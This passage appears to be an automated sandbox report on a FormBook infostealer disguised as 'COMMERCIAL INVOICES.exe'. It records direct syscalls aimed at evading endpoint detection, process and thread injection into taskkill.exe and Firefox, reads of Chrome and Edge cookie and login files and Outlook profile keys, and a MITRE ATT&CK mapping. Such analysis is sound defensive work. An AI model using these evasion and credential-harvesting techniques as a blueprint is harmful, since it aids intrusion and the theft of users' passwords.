            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012D6B40 mov eax, dword ptr fs:[00000030h]4_2_012D6B40
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0130AB40 mov eax, dword ptr fs:[00000030h]4_2_0130AB40
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01238B50 mov eax, dword ptr fs:[00000030h]4_2_01238B50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EEB50 mov eax, dword ptr fs:[00000030h]4_2_012EEB50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250BBE mov eax, dword ptr fs:[00000030h]4_2_01250BBE
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250BBE mov eax, dword ptr fs:[00000030h]4_2_01250BBE
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F4BB0 mov eax, dword ptr fs:[00000030h]4_2_012F4BB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012F4BB0 mov eax, dword ptr fs:[00000030h]4_2_012F4BB0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248BF0 mov eax, dword ptr fs:[00000030h]4_2_01248BF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248BF0 mov eax, dword ptr fs:[00000030h]4_2_01248BF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248BF0 mov eax, dword ptr fs:[00000030h]4_2_01248BF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126EBFC mov eax, dword ptr fs:[00000030h]4_2_0126EBFC
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CCBF0 mov eax, dword ptr fs:[00000030h]4_2_012CCBF0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01240BCD mov eax, dword ptr fs:[00000030h]4_2_01240BCD
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01240BCD mov eax, dword ptr fs:[00000030h]4_2_01240BCD
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01240BCD mov eax, dword ptr fs:[00000030h]4_2_01240BCD
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01260BCB mov eax, dword ptr fs:[00000030h]4_2_01260BCB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01260BCB mov eax, dword ptr fs:[00000030h]4_2_01260BCB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01260BCB mov eax, dword ptr fs:[00000030h]4_2_01260BCB
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EEBD0 mov eax, dword ptr fs:[00000030h]4_2_012EEBD0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127CA24 mov eax, dword ptr fs:[00000030h]4_2_0127CA24
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0126EA2E mov eax, dword ptr fs:[00000030h]4_2_0126EA2E
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01264A35 mov eax, dword ptr fs:[00000030h]4_2_01264A35
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01264A35 mov eax, dword ptr fs:[00000030h]4_2_01264A35
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127CA38 mov eax, dword ptr fs:[00000030h]4_2_0127CA38
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012CCA11 mov eax, dword ptr fs:[00000030h]4_2_012CCA11
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127CA6F mov eax, dword ptr fs:[00000030h]4_2_0127CA6F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127CA6F mov eax, dword ptr fs:[00000030h]4_2_0127CA6F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0127CA6F mov eax, dword ptr fs:[00000030h]4_2_0127CA6F
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012EEA60 mov eax, dword ptr fs:[00000030h]4_2_012EEA60
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BCA72 mov eax, dword ptr fs:[00000030h]4_2_012BCA72
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_012BCA72 mov eax, dword ptr fs:[00000030h]4_2_012BCA72
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246A50 mov eax, dword ptr fs:[00000030h]4_2_01246A50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246A50 mov eax, dword ptr fs:[00000030h]4_2_01246A50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246A50 mov eax, dword ptr fs:[00000030h]4_2_01246A50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246A50 mov eax, dword ptr fs:[00000030h]4_2_01246A50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246A50 mov eax, dword ptr fs:[00000030h]4_2_01246A50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246A50 mov eax, dword ptr fs:[00000030h]4_2_01246A50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01246A50 mov eax, dword ptr fs:[00000030h]4_2_01246A50
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250A5B mov eax, dword ptr fs:[00000030h]4_2_01250A5B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01250A5B mov eax, dword ptr fs:[00000030h]4_2_01250A5B
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248AA0 mov eax, dword ptr fs:[00000030h]4_2_01248AA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01248AA0 mov eax, dword ptr fs:[00000030h]4_2_01248AA0
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_01296AA4 mov eax, dword ptr fs:[00000030h]4_2_01296AA4
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h]4_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h]4_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h]4_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h]4_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h]4_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h]4_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h]4_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeCode function: 4_2_0124EA80 mov eax, dword ptr fs:[00000030h]4_2_0124EA80
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeMemory written: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: NULL target: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeSection loaded: NULL target: C:\Windows\SysWOW64\taskkill.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\taskkill.exeThread register set: target process: 5900Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\taskkill.exeThread APC queued: target process: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeProcess created: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe "C:\Users\user\Desktop\COMMERCIAL INVOICES.exe"Jump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\SysWOW64\taskkill.exe"Jump to behavior
            Source: oKWoZthfkV.exe, 00000005.00000000.2455618039.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000002.3898849675.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899374836.0000000001321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: oKWoZthfkV.exe, 00000005.00000000.2455618039.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000002.3898849675.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899374836.0000000001321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: oKWoZthfkV.exe, 00000005.00000000.2455618039.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000002.3898849675.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899374836.0000000001321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: oKWoZthfkV.exe, 00000005.00000000.2455618039.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000005.00000002.3898849675.0000000001861000.00000002.00000001.00040000.00000000.sdmp, oKWoZthfkV.exe, 00000009.00000002.3899374836.0000000001321000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeQueries volume information: C:\Users\user\Desktop\COMMERCIAL INVOICES.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\COMMERCIAL INVOICES.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\taskkill.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\taskkill.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.COMMERCIAL INVOICES.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.COMMERCIAL INVOICES.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.3899277856.00000000048F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2604198656.0000000005EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3898777340.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2543824282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3899336059.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2545033489.0000000003F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3899241480.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
